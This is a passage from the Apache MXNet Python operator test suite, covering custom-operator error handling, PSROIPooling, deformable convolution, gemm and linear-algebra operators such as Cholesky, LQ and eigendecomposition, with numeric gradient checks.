b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
assert_raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
assert_raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
assert_raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
assert_raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = int(image_height * spatial_scale)
feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# For now we only have a GPU implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condition holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = int(image_height * spatial_scale)
feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the sampling locations fall on valid (differentiable) points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# For now we only have a GPU implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
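# rep_3x replicates a matrix three times into a (3, 1, m, n) batch so that the batched
# operators can be checked against the corresponding single-matrix result.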
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check with a different axis argument describing the matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from the other linalg operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
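# Symmetrize a over its last two axes: return 0.5 * (a + a^T), so that numeric gradient
# checks always see a symmetric input.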
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
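# Build an m x m mask that is 1 on and below the diagonal (or on and above it, if lower=False)
# and multiply it into a by broadcasting, zeroing out the other triangle so a becomes a proper
# triangular factor.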
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
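# rep_3x tiles a single (m, n) matrix three times into a (3, 1, m, n) batch so that the
# batched code paths of the operators are exercised with identical data.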
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: the input has to be symmetrized for the gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
# test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
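# Combined LQ check: for A = L * Q with row-orthonormal Q, Q * Q^T should be the identity
# and L * Q should reproduce A.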
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If the unused output is left dangling, things break for dtype=np.float64: the backward
# gradient for the unused output then has dtype np.float32. The helpers below therefore tie the
# unused output in through a zero-valued term.
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
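# Combined syevd check: U * U^T should be the identity and U^T * diag(lam) * U should
# reconstruct the symmetric input.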
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as these tests need CUDA 8
# and the MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
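# NumPy reference for syevd: eigenvalues sorted in ascending order, eigenvectors returned as
# rows of u, each sign-normalized so that its largest-magnitude entry is positive.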
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
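# Reference gradient w.r.t. the symmetric input: start from diag(grad_l), fill the off-diagonal
# entries with the antisymmetric part of grad_u * u^T divided by 2*(l[i] - l[j]), then rotate
# the result back via u^T (.) u.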
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs CUDA 8
# and the MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
